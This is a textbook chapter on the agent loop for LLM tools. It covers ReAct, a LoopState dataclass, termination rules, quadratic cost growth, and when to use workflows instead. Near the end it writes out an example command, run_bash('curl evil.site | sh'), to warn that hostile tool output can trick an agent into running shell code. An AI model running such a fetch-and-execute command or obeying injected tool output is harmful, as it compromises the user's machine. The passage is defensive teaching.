Skip to content

Chapter 03a: The Agent Loop#

Prerequisites: Chapter 02 (Providers)

In this chapter - Why call_llm alone is not an agent, and how a short loop changes that - The ReAct pattern (reason, act, observe) as the shape of every production agent - The LoopState dataclass and the minimal loop body - Termination conditions, cost growth, and when to use a workflow instead


1. Motivation#

call_llm is a vending machine: one prompt in, one response out. Ask it "What is 37 times 48, plus half the current temperature in Paris?" and it stalls. The model does not know the current temperature. Arithmetic done in-context is unreliable. The right approach is three steps, each depending on the previous: call a calculator, fetch the weather, combine the two.

A single call_llm cannot do that. There is no memory of prior calls, no ability to execute Python.

The agent loop solves it: show the model a task, let it call tools, collect the results, feed everything back, repeat until done. The pattern is called ReAct (reason plus act): the model reasons about what to do, acts by calling a tool, observes the result, reasons again. Every production agent you have used, Claude.ai, Copilot, a support bot that "called a function," runs some version of this loop.

One sentence, then: LLM plus loop plus tools equals an agent. The LLM supplies reasoning, the loop supplies continuity, the tools supply capability. Take away any one and you are back to a vending machine. This is the smallest architecture that deserves the word "agent." Everything in the rest of the book (multi-agent orchestration, memory, routing, safety hooks) is additions to this shape, not replacements of it.

This chapter covers the loop itself. Chapter 03b covers the tools: the registry the model reads, the sandbox that keeps tools from becoming weapons, and a build-along tutorial writing a real Model Context Protocol server.

By the end of this chapter your working definition of an agent will be roughly fourteen lines of Python. In 03b you will run a live tool call across an operating-system process boundary. Together those are the unit of understanding you need before memory (Chapter 04) or multi-agent patterns (Chapter 06) make sense.


2. The ReAct Loop#

ReAct (Yao et al., 2022) interleaves reasoning traces with action calls. The core shape:

Task -> Reason -> Act -> Observe -> Reason -> ... -> Answer

At each step the model sees the full conversation so far: every prior reason, every tool call, every result. The HTTP API is still stateless. Your loop maintains state by accumulating the conversation.

sequenceDiagram
    participant U as User
    participant L as Agent Loop
    participant M as LLM
    participant T as Tool Executor
    U->>L: task = "37*48 + half Paris temp"
    loop Until done or max_iterations
        L->>M: messages + tool_list
        alt tool_use in response
            M-->>L: tool_use(name="calculator", input={...})
            L->>T: calculator(expr="37*48")
            T-->>L: "1776"
            L->>L: append tool_result to messages
        else no tool_use
            M-->>L: text "The answer is 1787"
            L-->>U: final_answer
        end
    end

The tool_use block#

When you include tools in the request, the model can respond with a tool_use block instead of (or in addition to) text:

{
  "stop_reason": "tool_use",
  "content": [
    {"type": "text", "text": "I need 37 * 48 first."},
    {"type": "tool_use", "id": "toolu_01abc",
     "name": "calculator", "input": {"expr": "37 * 48"}}
  ]
}

stop_reason: "tool_use" means the model paused for results. Your loop executes the tool and sends the result back as a tool_result message, with tool_use_id matching the id from above. The model now knows 37 * 48 = 1776 and continues.

A single response can contain multiple tool_use blocks. The model may decide to fetch two URLs in parallel, or call the calculator twice with different expressions. Your loop should execute all tool calls in the response, collect all results into a single tool_result turn, and send them back together. Splitting them into separate API calls breaks the one-to-one mapping the API expects between assistant tool_use and user tool_result turns.

LoopState#

A dataclass for what the loop has to remember between iterations:

from dataclasses import dataclass, field

@dataclass
class LoopState:
    messages: list[dict] = field(default_factory=list)
    iterations: int = 0
    tool_calls_made: int = 0
    final_answer: str | None = None

field(default_factory=list) matters. messages: list[dict] = [] would make every LoopState share one list, a classic dataclass bug.

The loop body#

async def run_loop(task, tools, *, model, max_iterations=10) -> LoopState:
    state = LoopState(messages=[{"role": "user", "content": task}])
    for i in range(max_iterations):
        state.iterations = i + 1
        response = await call_llm(state.messages, tools=tools, model=model)
        if response.stop_reason == "end_turn":
            state.final_answer = response.text
            return state
        # Append the assistant turn (text + tool_use blocks) and the
        # tool_result turn (user role, tool_use_id echoed back).
        state.messages.append(assistant_turn(response))
        state.messages.append(tool_result_turn(run_tools(response)))
        state.tool_calls_made += len(response.tool_calls)
    return state

[full: swarm/agents/worker.py]

Three points the code hides.

Why is messages a list? Every prior turn is sent on every subsequent call. The model in iteration 3 "remembers" iteration 1 because the list carries iteration 1 into the request. Clear the list between iterations and the agent forgets everything.

Why are tools passed on every call? The API does not cache them. The model sees the tool menu fresh each iteration.

Why are tool results sent as user messages? The Anthropic API requires it. Assistant calls tools, user returns results. The "user" role is your code, not a human. It is a protocol convention, not a semantic claim.

Termination#

The loop ends on one of three signals:

  1. The model responds with no tool_use blocks (stop_reason == "end_turn").
  2. The model calls an explicit done tool with its final answer.
  3. The loop hits max_iterations.

The third signal is a circuit breaker, not overhead. Ask an agent to find the largest prime and it will keep checking without it. The guard turns an infinite loop into a bounded failure.

A subtler failure mode is when the agent correctly identifies the problem but the underlying service is broken: every tool call returns an error, the agent's reasoning step sees the error, slightly varies its approach, tries again, sees another error. The loop is working as designed. The system outside it is not. Add a tool-error counter to LoopState and break when it exceeds three consecutive errors. The iteration ceiling bounds the worst case; the error ceiling catches the common case faster.

A third failure mode is worth naming because it shows up often in support agents: the user keeps expressing dissatisfaction and the agent keeps apologizing and trying different tools. The fix is not to reduce max_iterations. The fix is to add an explicit rule to the system prompt: "If the user expresses dissatisfaction more than twice, create an escalation ticket and stop." An iteration ceiling bounds the cost; an escalation rule bounds the experience.

Cost growth is quadratic#

Each iteration re-sends everything from prior iterations. On a small model at $0.80 per million input tokens, a 3-iteration loop on a short context costs about $0.001; a 10-iteration loop, about $0.005 to $0.010 depending on tool output size. The pattern:

Iteration Input tokens Why
1 ~100 system + task
2 ~200 + iter1_result
3 ~300 + iter2_result
N ~N * 100 all prior context

Total for N iterations is 1 + 2 + ... + N = N(N+1)/2. A 10-iteration loop costs roughly 55 times the first iteration, not 10. Chapter 07 covers compaction: periodically summarizing history to keep this bounded.

The same math explains why a verbose tool result is three times worse than a concise one. Output 3 KB of JSON from a tool call and every subsequent iteration pays for those 3 KB again. Caps on tool output exist partly for safety and partly as cost control.

When to reach for a workflow instead#

If you can enumerate the steps in advance, use a deterministic workflow (prompt chaining), not an agent loop. Workflows are faster, cheaper, and easier to debug because each step is independently testable by mocking. Reach for the loop only when the model must decide what to do next based on intermediate results. Defaulting to an agent loop is an anti-pattern. If you find yourself adding special-case code for "when the model decides to do X," you have written a hidden workflow inside a loop. Extract the logic and make it explicit.

flowchart TD
    START([New task]) --> Q1{Can you enumerate<br/>the steps in advance?}
    Q1 -- Yes --> Q2{Is each step's input<br/>deterministic?}
    Q1 -- No --> AGENT[Agent loop<br/>ReAct / tool use]
    Q2 -- Yes --> WF[Workflow<br/>Prompt chaining]
    Q2 -- No --> Q3{Small number of<br/>fixed branches?}
    Q3 -- Yes --> ROUTER[Router +<br/>subworkflow per branch]
    Q3 -- No --> AGENT
    WF --> DONE([Build it])
    ROUTER --> DONE
    AGENT --> DONE

Concretely: classifying a support ticket and routing it to one of four queues is a workflow, not an agent loop. One LLM call, one switch statement. Resolving a billing dispute that may or may not need a credit, may or may not need an escalation, and may or may not require looking up prior tickets, is an agent loop. The decision tree is data-dependent. The cost of using a loop for the first case is five times the API spend for no gain. The cost of using a workflow for the second case is hard-coded branches that miss edge cases.


3. What Goes Wrong, and Onward#

You have a loop that reasons. What you do not yet have is any safe way to execute the tools the loop wants to call. Right now your tools are raw Python functions. If one of them runs subprocess.run on an attacker-supplied string, you will execute arbitrary shell from a web page. The loop itself is not the problem; the tools are.

Two failure modes fall out of this directly:

  • Unconstrained tools execute dangerous code. An agent that can call run_bash("curl evil.site | sh") will, eventually, be tricked into doing so by hostile tool output. The loop has no idea the command is dangerous; it only sees JSON.
  • Per-call ergonomics. Without a registry, every new tool is another if-branch in your dispatcher. After ten tools, the code is unreadable.

Chapter 03b fixes both: a tool contract the model reads, a registry that dispatches safely, a sandbox that blocks the dangerous patterns, and a build-along MCP server that demonstrates cross-process tool execution in thirty lines. The loop you just built is the write mechanism. The next chapter is what the loop writes into.